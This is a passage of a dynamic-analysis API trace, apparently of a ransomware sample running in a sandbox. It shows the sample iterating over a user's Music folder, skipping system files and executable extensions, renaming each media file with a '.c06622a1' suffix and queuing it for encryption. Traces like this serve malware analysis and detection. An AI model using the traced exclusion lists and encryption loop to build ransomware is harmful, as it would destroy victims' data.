wcslen (_String="ntldr") returned 0x5 [0160.668] _wcsicmp (_Str1="ntuser.dat", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -11 [0160.668] wcslen (_String="ntuser.dat") returned 0xa [0160.668] _wcsicmp (_Str1="ntuser.dat.log", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -11 [0160.668] wcslen (_String="ntuser.dat.log") returned 0xe [0160.668] _wcsicmp (_Str1="ntuser.ini", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -11 [0160.668] wcslen (_String="ntuser.ini") returned 0xa [0160.668] _wcsicmp (_Str1="thumbs.db", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -5 [0160.668] wcslen (_String="thumbs.db") returned 0x9 [0160.668] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.668] wcslen (_String="386") returned 0x3 [0160.668] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.668] wcslen (_String="adv") returned 0x3 [0160.668] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.668] wcslen (_String="ani") returned 0x3 [0160.668] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.668] wcslen (_String="bat") returned 0x3 [0160.668] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.668] wcslen (_String="bin") returned 0x3 [0160.668] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.668] wcslen (_String="cab") returned 0x3 [0160.668] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.668] wcslen (_String="cmd") returned 0x3 [0160.668] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.668] wcslen (_String="com") returned 0x3 [0160.668] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.668] wcslen (_String="cpl") returned 0x3 [0160.668] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.668] wcslen (_String="cur") returned 0x3 [0160.668] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.668] wcslen (_String="deskthemepack") returned 0xd [0160.668] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.669] wcslen (_String="diagcab") returned 0x7 [0160.669] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.669] wcslen (_String="diagcfg") returned 0x7 [0160.669] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.669] wcslen (_String="diagpkg") returned 0x7 [0160.669] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.669] wcslen (_String="dll") returned 0x3 [0160.669] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.669] wcslen (_String="drv") returned 0x3 [0160.669] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.669] wcslen (_String="exe") returned 0x3 [0160.669] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.669] wcslen (_String="hlp") returned 0x3 [0160.669] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.669] wcslen (_String="icl") returned 0x3 [0160.669] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.669] wcslen (_String="icns") returned 0x4 [0160.669] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.669] wcslen (_String="ico") returned 0x3 [0160.669] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.669] wcslen (_String="ics") returned 0x3 [0160.669] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.669] wcslen (_String="idx") returned 0x3 [0160.669] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.669] wcslen (_String="ldf") returned 0x3 [0160.669] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.669] wcslen (_String="lnk") returned 0x3 [0160.669] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.669] wcslen (_String="mod") returned 0x3 [0160.669] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.669] wcslen (_String="mpa") returned 0x3 [0160.669] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.669] wcslen (_String="msc") returned 0x3 [0160.669] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.669] wcslen (_String="msp") returned 0x3 [0160.669] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.669] wcslen (_String="msstyles") returned 0x8 [0160.669] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.670] wcslen (_String="msu") returned 0x3 [0160.670] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.670] wcslen (_String="nls") returned 0x3 [0160.670] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.670] wcslen (_String="nomedia") returned 0x7 [0160.670] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.670] wcslen (_String="ocx") returned 0x3 [0160.670] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.670] wcslen (_String="prf") returned 0x3 [0160.670] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.670] wcslen (_String="ps1") returned 0x3 [0160.670] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.670] wcslen (_String="rom") returned 0x3 [0160.670] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.670] wcslen (_String="rtp") returned 0x3 [0160.670] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.670] wcslen (_String="scr") returned 0x3 [0160.670] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.670] wcslen (_String="shs") returned 0x3 [0160.670] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.670] wcslen (_String="spl") returned 0x3 [0160.670] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.670] wcslen (_String="sys") returned 0x3 [0160.670] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.670] wcslen (_String="theme") returned 0x5 [0160.670] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.670] wcslen (_String="themepack") returned 0x9 [0160.670] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.670] wcslen (_String="wpx") returned 0x3 [0160.670] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.670] wcslen (_String="lock") returned 0x4 [0160.670] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.670] wcslen (_String="key") returned 0x3 [0160.670] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.670] wcslen (_String="hta") returned 0x3 [0160.670] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.670] wcslen (_String="msi") returned 0x3 [0160.670] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.670] wcslen (_String="pdb") returned 0x3 [0160.671] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.671] wcslen (_String="sqlite") returned 0x6 [0160.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0160.671] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.671] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0160.671] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned 0x2e [0160.671] wcscpy (in: _Dest=0x32400be, _Source="yBPZah0nIIj3ymKj190.mp3" | out: _Dest="yBPZah0nIIj3ymKj190.mp3") returned="yBPZah0nIIj3ymKj190.mp3" [0160.671] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3", dwFileAttributes=0x80) returned 1 [0160.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\ybpzah0niij3ymkj190.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0160.671] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.671] ReadFile (in: hFile=0x1e8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0160.672] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xf16ee627 [0160.672] RtlComputeCrc32 (PartialCrc=0xe627, Buffer=0x32e9a4, Length=0x80) returned 0x99ea39d8 [0160.672] RtlComputeCrc32 (PartialCrc=0x39d8, Buffer=0x32e9a4, Length=0x80) returned 0x12a3d458 [0160.672] RtlComputeCrc32 (PartialCrc=0xd458, Buffer=0x32e9a4, Length=0x80) returned 0x848b48b [0160.672] RtlComputeCrc32 (PartialCrc=0xb48b, Buffer=0x32e9a4, Length=0x80) returned 0x6f85fee8 [0160.672] CloseHandle (hObject=0x1e8) returned 1 [0160.672] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.672] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3" [0160.672] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3") returned 0x46 [0160.672] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.672] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\ybpzah0niij3ymkj190.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\ybpzah0niij3ymkj190.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\yBPZah0nIIj3ymKj190.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\ybpzah0niij3ymkj190.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e8 [0160.675] CreateIoCompletionPort (FileHandle=0x1e8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.675] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3f3edd8d [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b33a21 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xbc86c80 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x343987a3 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x268e82a7 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f463d01 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2e439e58 [0160.682] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18cfaecc [0160.685] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x5e4918db [0160.685] RtlComputeCrc32 (PartialCrc=0x18db, Buffer=0x35a0094, Length=0x80) returned 0xad39661e [0160.685] RtlComputeCrc32 (PartialCrc=0x661e, Buffer=0x35a0094, Length=0x80) returned 0x5bf5ccde [0160.685] RtlComputeCrc32 (PartialCrc=0xccde, Buffer=0x35a0094, Length=0x80) returned 0x97ef9804 [0160.685] RtlComputeCrc32 (PartialCrc=0x9804, Buffer=0x35a0094, Length=0x80) returned 0xb9db68d1 [0160.685] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0160.685] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.685] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.685] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f6d260, ftCreationTime.dwHighDateTime=0x1d5e0d8, ftLastAccessTime.dwLowDateTime=0x3fd89d0, ftLastAccessTime.dwHighDateTime=0x1d5e33f, ftLastWriteTime.dwLowDateTime=0x3fd89d0, ftLastWriteTime.dwHighDateTime=0x1d5e33f, nFileSizeHigh=0x0, nFileSizeLow=0xe7fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yuqn.m4a", cAlternateFileName="")) returned 1 [0160.685] _wcsicmp (_Str1="Yuqn.m4a", _Str2="README.c06622a1.TXT") returned 7 [0160.685] wcsstr (_Str="Yuqn.m4a", _SubStr="README") returned 0x0 [0160.685] _wcsicmp (_Str1="autorun.inf", _Str2="Yuqn.m4a") returned -24 [0160.685] wcslen (_String="autorun.inf") returned 0xb [0160.685] _wcsicmp (_Str1="boot.ini", _Str2="Yuqn.m4a") returned -23 [0160.685] wcslen (_String="boot.ini") returned 0x8 [0160.685] _wcsicmp (_Str1="bootfont.bin", _Str2="Yuqn.m4a") returned -23 [0160.685] wcslen (_String="bootfont.bin") returned 0xc [0160.685] _wcsicmp (_Str1="bootsect.bak", _Str2="Yuqn.m4a") returned -23 [0160.686] wcslen (_String="bootsect.bak") returned 0xc [0160.686] _wcsicmp (_Str1="desktop.ini", _Str2="Yuqn.m4a") returned -21 [0160.686] wcslen (_String="desktop.ini") returned 0xb [0160.686] _wcsicmp (_Str1="iconcache.db", _Str2="Yuqn.m4a") returned -16 [0160.686] wcslen (_String="iconcache.db") returned 0xc [0160.686] _wcsicmp (_Str1="ntldr", _Str2="Yuqn.m4a") returned -11 [0160.686] wcslen (_String="ntldr") returned 0x5 [0160.686] _wcsicmp (_Str1="ntuser.dat", _Str2="Yuqn.m4a") returned -11 [0160.686] wcslen (_String="ntuser.dat") returned 0xa [0160.686] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Yuqn.m4a") returned -11 [0160.686] wcslen (_String="ntuser.dat.log") returned 0xe [0160.686] _wcsicmp (_Str1="ntuser.ini", _Str2="Yuqn.m4a") returned -11 [0160.686] wcslen (_String="ntuser.ini") returned 0xa [0160.686] _wcsicmp (_Str1="thumbs.db", _Str2="Yuqn.m4a") returned -5 [0160.686] wcslen (_String="thumbs.db") returned 0x9 [0160.686] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.686] wcslen (_String="386") returned 0x3 [0160.686] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.686] wcslen (_String="adv") returned 0x3 [0160.686] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.686] wcslen (_String="ani") returned 0x3 [0160.686] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.686] wcslen (_String="bat") returned 0x3 [0160.686] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.686] wcslen (_String="bin") returned 0x3 [0160.686] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.686] wcslen (_String="cab") returned 0x3 [0160.686] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.686] wcslen (_String="cmd") returned 0x3 [0160.686] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.686] wcslen (_String="com") returned 0x3 [0160.686] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.686] wcslen (_String="cpl") returned 0x3 [0160.687] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.687] wcslen (_String="cur") returned 0x3 [0160.687] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.687] wcslen (_String="deskthemepack") returned 0xd [0160.687] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.687] wcslen (_String="diagcab") returned 0x7 [0160.687] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.687] wcslen (_String="diagcfg") returned 0x7 [0160.687] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.687] wcslen (_String="diagpkg") returned 0x7 [0160.687] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.687] wcslen (_String="dll") returned 0x3 [0160.687] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.687] wcslen (_String="drv") returned 0x3 [0160.687] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.687] wcslen (_String="exe") returned 0x3 [0160.687] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.687] wcslen (_String="hlp") returned 0x3 [0160.687] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.687] wcslen (_String="icl") returned 0x3 [0160.687] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.687] wcslen (_String="icns") returned 0x4 [0160.687] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.687] wcslen (_String="ico") returned 0x3 [0160.687] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.687] wcslen (_String="ics") returned 0x3 [0160.687] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.687] wcslen (_String="idx") returned 0x3 [0160.687] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.687] wcslen (_String="ldf") returned 0x3 [0160.687] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.687] wcslen (_String="lnk") returned 0x3 [0160.687] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.687] wcslen (_String="mod") returned 0x3 [0160.687] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.687] wcslen (_String="mpa") returned 0x3 [0160.688] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.688] wcslen (_String="msc") returned 0x3 [0160.688] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.688] wcslen (_String="msp") returned 0x3 [0160.688] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.688] wcslen (_String="msstyles") returned 0x8 [0160.688] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.688] wcslen (_String="msu") returned 0x3 [0160.688] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.688] wcslen (_String="nls") returned 0x3 [0160.688] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.688] wcslen (_String="nomedia") returned 0x7 [0160.688] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.688] wcslen (_String="ocx") returned 0x3 [0160.688] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.688] wcslen (_String="prf") returned 0x3 [0160.688] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.688] wcslen (_String="ps1") returned 0x3 [0160.688] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.688] wcslen (_String="rom") returned 0x3 [0160.688] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.688] wcslen (_String="rtp") returned 0x3 [0160.688] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.688] wcslen (_String="scr") returned 0x3 [0160.688] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.688] wcslen (_String="shs") returned 0x3 [0160.688] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.688] wcslen (_String="spl") returned 0x3 [0160.688] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.688] wcslen (_String="sys") returned 0x3 [0160.688] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.688] wcslen (_String="theme") returned 0x5 [0160.688] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.688] wcslen (_String="themepack") returned 0x9 [0160.688] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.689] wcslen (_String="wpx") returned 0x3 [0160.689] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.689] wcslen (_String="lock") returned 0x4 [0160.689] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.689] wcslen (_String="key") returned 0x3 [0160.689] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.689] wcslen (_String="hta") returned 0x3 [0160.689] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.689] wcslen (_String="msi") returned 0x3 [0160.689] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.689] wcslen (_String="pdb") returned 0x3 [0160.689] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.689] wcslen (_String="sqlite") returned 0x6 [0160.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0160.689] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.689] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0160.689] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned 0x2e [0160.689] wcscpy (in: _Dest=0x32400be, _Source="Yuqn.m4a" | out: _Dest="Yuqn.m4a") returned="Yuqn.m4a" [0160.689] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a", dwFileAttributes=0x80) returned 1 [0160.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\yuqn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0160.690] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.690] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0160.691] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xa714b691 [0160.691] RtlComputeCrc32 (PartialCrc=0xb691, Buffer=0x32e9a4, Length=0x80) returned 0x69e3779e [0160.691] RtlComputeCrc32 (PartialCrc=0x779e, Buffer=0x32e9a4, Length=0x80) returned 0x79490f90 [0160.691] RtlComputeCrc32 (PartialCrc=0xf90, Buffer=0x32e9a4, Length=0x80) returned 0xb6b32025 [0160.691] RtlComputeCrc32 (PartialCrc=0x2025, Buffer=0x32e9a4, Length=0x80) returned 0x1e099b90 [0160.691] CloseHandle (hObject=0x1a0) returned 1 [0160.691] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.691] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a" [0160.691] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a") returned 0x37 [0160.691] wcscpy (in: _Dest=0x32500d6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.691] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\yuqn.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\yuqn.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\Yuqn.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\yuqn.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0160.694] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.694] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x560a9ce7 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10b1f427 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39b0fd07 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42708e67 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d3983 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b6c0885 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ada2098 [0160.700] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f0a829 [0160.703] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0xebdeb76f [0160.703] RtlComputeCrc32 (PartialCrc=0xb76f, Buffer=0x3630094, Length=0x80) returned 0xcc22ae01 [0160.703] RtlComputeCrc32 (PartialCrc=0xae01, Buffer=0x3630094, Length=0x80) returned 0x4a0568a0 [0160.703] RtlComputeCrc32 (PartialCrc=0x68a0, Buffer=0x3630094, Length=0x80) returned 0x29013606 [0160.703] RtlComputeCrc32 (PartialCrc=0x3606, Buffer=0x3630094, Length=0x80) returned 0x1627d91 [0160.704] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0160.704] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.704] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.704] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.704] FindClose (in: hFindFile=0x154188 